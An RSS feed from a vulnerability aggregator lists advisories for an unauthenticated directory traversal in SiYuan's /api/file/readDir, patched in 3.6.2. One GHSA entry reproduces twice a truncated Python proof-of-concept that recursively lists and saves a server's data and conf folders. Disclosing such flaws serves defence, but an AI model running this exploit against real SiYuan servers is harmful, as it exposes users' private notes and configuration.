<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 02:25:07 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-277975</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-277975</link>
      <description>EUVD-2026-277975</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-277975</guid>
    </item>
    <item>
      <title>fkie_cve-2026-33670</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-33670</link>
      <description>&lt;p&gt;SiYuan is a personal knowledge management system. Prior to version 3.6.2, the /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook. Version 3.6.2 patches the issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;SiYuan is a personal knowledge management system. Prior to version 3.6.2, the /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook. Version 3.6.2 patches the issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-33670</guid>
    </item>
    <item>
      <title>GHSA-xmw9-6r43-x9ww — SiYuan has directory traversal within its publishing service</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-xmw9-6r43-x9ww</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/siyuan-note/siyuan/kernel&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;The /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;```python
#!/usr/bin/env python3
&amp;#34;&amp;#34;&amp;#34;POC: SiYuan /api/file/readDir 未鉴权目录遍历&amp;#34;&amp;#34;&amp;#34;
import requests, json, sys&lt;/p&gt;
&lt;p&gt;def poc(target):
    base = target.rstrip(&amp;#34;/&amp;#34;)
    url = f&amp;#34;{base}/api/file/readDir&amp;#34;&lt;/p&gt;
&lt;p&gt;def read_dir(path, depth=0, max_depth=4):
        try:
            r = requests.post(url, json={&amp;#34;path&amp;#34;:path},
                            headers={&amp;#34;Content-Type&amp;#34;:&amp;#34;application/json&amp;#34;}, timeout=10)
            data = r.json()
        except Exception as e:
            return
        if data.get(&amp;#34;code&amp;#34;) != 0:
            return&lt;/p&gt;
&lt;p&gt;entries = data.get(&amp;#34;data&amp;#34;) or []
        for entry in entries:
            name = entry.get(&amp;#34;name&amp;#34;,&amp;#34;&amp;#34;)
            if name.startswith(&amp;#34;.&amp;#34;):
                continue
            icon = &amp;#34;📁&amp;#34; if entry.get(&amp;#34;isDir&amp;#34;) else &amp;#34;📄&amp;#34;
            indent = &amp;#34;  &amp;#34; * depth
            print(f&amp;#34;  {indent}{icon} {name}&amp;#34;)&lt;/p&gt;
&lt;p&gt;if entry.get(&amp;#34;isDir&amp;#34;) and depth &amp;lt; max_depth:
                read_dir(f&amp;#34;{path}/{name}&amp;#34;, depth+1, max_depth)&lt;/p&gt;
&lt;p&gt;# 遍历根目录
    print(&amp;#34;[+] 漏洞存在！开始遍历\n&amp;#34;)
    print(&amp;#34;  📂 data/&amp;#34;)
    read_dir(&amp;#34;data&amp;#34;, max_depth=2)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;\n  📂 conf/&amp;#34;)
    read_dir(&amp;#34;conf&amp;#34;, max_depth=2)&lt;/p&gt;
&lt;p&gt;# 保存
    try:
        r = requests.post(url, json={&amp;#34;path&amp;#34;:&amp;#34;data&amp;#34;},
                        headers={&amp;#34;Content-Type&amp;#34;:&amp;#34;application/json&amp;#34;}, timeout=10)
        with open(&amp;#34;readdir.json&amp;#34;,&amp;#34;w&amp;#34;,encoding=&amp;#34;utf-8&amp;#34;) as f:
            json.dump(r.json(), f, ens…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/siyuan-note/siyuan/kernel&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;The /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;```python
#!/usr/bin/env python3
&amp;#34;&amp;#34;&amp;#34;POC: SiYuan /api/file/readDir 未鉴权目录遍历&amp;#34;&amp;#34;&amp;#34;
import requests, json, sys&lt;/p&gt;
&lt;p&gt;def poc(target):
    base = target.rstrip(&amp;#34;/&amp;#34;)
    url = f&amp;#34;{base}/api/file/readDir&amp;#34;&lt;/p&gt;
&lt;p&gt;def read_dir(path, depth=0, max_depth=4):
        try:
            r = requests.post(url, json={&amp;#34;path&amp;#34;:path},
                            headers={&amp;#34;Content-Type&amp;#34;:&amp;#34;application/json&amp;#34;}, timeout=10)
            data = r.json()
        except Exception as e:
            return
        if data.get(&amp;#34;code&amp;#34;) != 0:
            return&lt;/p&gt;
&lt;p&gt;entries = data.get(&amp;#34;data&amp;#34;) or []
        for entry in entries:
            name = entry.get(&amp;#34;name&amp;#34;,&amp;#34;&amp;#34;)
            if name.startswith(&amp;#34;.&amp;#34;):
                continue
            icon = &amp;#34;📁&amp;#34; if entry.get(&amp;#34;isDir&amp;#34;) else &amp;#34;📄&amp;#34;
            indent = &amp;#34;  &amp;#34; * depth
            print(f&amp;#34;  {indent}{icon} {name}&amp;#34;)&lt;/p&gt;
&lt;p&gt;if entry.get(&amp;#34;isDir&amp;#34;) and depth &amp;lt; max_depth:
                read_dir(f&amp;#34;{path}/{name}&amp;#34;, depth+1, max_depth)&lt;/p&gt;
&lt;p&gt;# 遍历根目录
    print(&amp;#34;[+] 漏洞存在！开始遍历\n&amp;#34;)
    print(&amp;#34;  📂 data/&amp;#34;)
    read_dir(&amp;#34;data&amp;#34;, max_depth=2)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;\n  📂 conf/&amp;#34;)
    read_dir(&amp;#34;conf&amp;#34;, max_depth=2)&lt;/p&gt;
&lt;p&gt;# 保存
    try:
        r = requests.post(url, json={&amp;#34;path&amp;#34;:&amp;#34;data&amp;#34;},
                        headers={&amp;#34;Content-Type&amp;#34;:&amp;#34;application/json&amp;#34;}, timeout=10)
        with open(&amp;#34;readdir.json&amp;#34;,&amp;#34;w&amp;#34;,encoding=&amp;#34;utf-8&amp;#34;) as f:
            json.dump(r.json(), f, ens…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-xmw9-6r43-x9ww</guid>
    </item>
  </channel>
</rss>
